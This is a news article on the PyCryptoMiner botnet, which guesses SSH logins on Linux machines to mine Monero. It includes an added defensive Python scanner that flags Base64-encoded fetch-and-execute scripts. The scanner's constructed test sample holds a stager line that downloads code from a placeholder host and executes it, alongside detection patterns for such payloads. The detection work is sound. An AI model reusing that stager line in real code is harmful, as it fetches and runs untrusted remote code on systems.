Security researchers at F5 Networks have discovered a new Linux crypto-mining botnet, dubbed “PyCryptoMiner,” that targets Linux systems with public SSH ports.
According to the researchers, PyCryptoMiner includes the following five features:
1. Based on the Python scripting language, which means it is difficult to detect
2. When the original command and control (C&C) server is unavailable, a new C&C server assignment is received using Pastebin.com (under the username “WHATHAPPEN”)
3. The domain name registrant is linked to more than 36,000 domain names, some of which have been known for fraud, gambling and adult services since 2012
4. Used to mine Monero, a highly anonymous cryptocurrency favored by cybercriminals. As of late December 2017, PyCryptoMiner had mined approximately $46,000 worth of Monero
5. A new scanning feature that looks for JBoss servers vulnerable to CVE-2017-12149 was rolled out in mid-December
Unlike binary malware alternatives, PyCryptoMiner is based on the Python scripting language, which makes it easier to obfuscate and more evasive. It is also executed by a legitimate binary.
PyCryptoMiner propagates by trying to guess the SSH login credentials of the target Linux device, and if successful, it deploys a simple Base64-encoded Python script that connects to the C&C server to download and execute additional Python code.
The Python script also collects information about the infected device, including the host/DNS name, operating system name and architecture, number of CPUs, and CPU usage. It also checks whether the device is already infected, and whether the infected device is used for Monero mining or for scanning.
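An added example, not code from the F5 report or the original article: a defender-side check that decodes Base64 runs in Python command lines (for instance from process listings or cron entries) and flags those whose decoded text contains both a network fetch and code execution, the behaviour described above. The sample command lines, the placeholder host and the token lists are constructed assumptions.

```python
import base64
import binascii
import re

# Heuristic token lists (assumptions for this example, not F5 indicators).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
FETCH = re.compile(r"\b(urllib2?|urlopen|httplib|requests|socket)\b")
EXECUTE = re.compile(r"\b(exec|eval|compile|system|subprocess)\b")


def decode_candidates(cmdline):
    """Yield the text of every base64-looking run that decodes to UTF-8."""
    for run in B64_RUN.findall(cmdline):
        try:
            padded = run + "=" * (-len(run) % 4)
            yield base64.b64decode(padded, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text: ignore


def is_suspicious(cmdline):
    """True if a Python command line carries an encoded script containing
    both a network-fetch token and a code-execution token."""
    if "python" not in cmdline:
        return False
    return any(FETCH.search(text) and EXECUTE.search(text)
               for text in decode_candidates(cmdline))


def scan(cmdlines):
    """Return the command lines that should be reviewed by an analyst."""
    return [c for c in cmdlines if is_suspicious(c)]


def _wrap(script):
    """Build a constructed 'python -c' line around an encoded script."""
    blob = base64.b64encode(script.encode()).decode()
    return "python -c \"import base64;exec(base64.b64decode('%s'))\"" % blob


# Constructed samples; the host is a placeholder under .invalid.
STAGER = "import urllib2\nexec(urllib2.urlopen('http://c2.example.invalid/a').read())"
BENIGN = "print('backup finished at %s' % __import__('time').ctime())"
SAMPLES = [_wrap(STAGER), _wrap(BENIGN),
           "/usr/bin/python /opt/app/manage.py runserver"]

if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print("REVIEW:", hit)
```

Only the first constructed sample is flagged: the second is Base64-wrapped but neither fetches nor executes remote content, and the third carries no encoded payload at all.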
Using information provided on Pastebin[.]com, the researchers determined that PyCryptoMiner may have been activated in August 2017. At the time of the investigation the resource had been viewed 177,987 times, and the count was growing by about 1,000 views a day.
A query of the domain name “zsw8.cc” for these C&C servers turned up the registrant name as “xinqian Rhys”.
The registrant is linked to more than 36,000 domain names, some of which have been known for fraud, gambling and adult services since 2012.
PyCryptoMiner uses two wallet addresses, which hold 94 and 64 Monero, worth about $46,000.
Python-based botnets turn Linux Machines into Mining robots https://www.oschina.net/news/92261/pycryptominer-linux-machines-turns-monero-mining-bots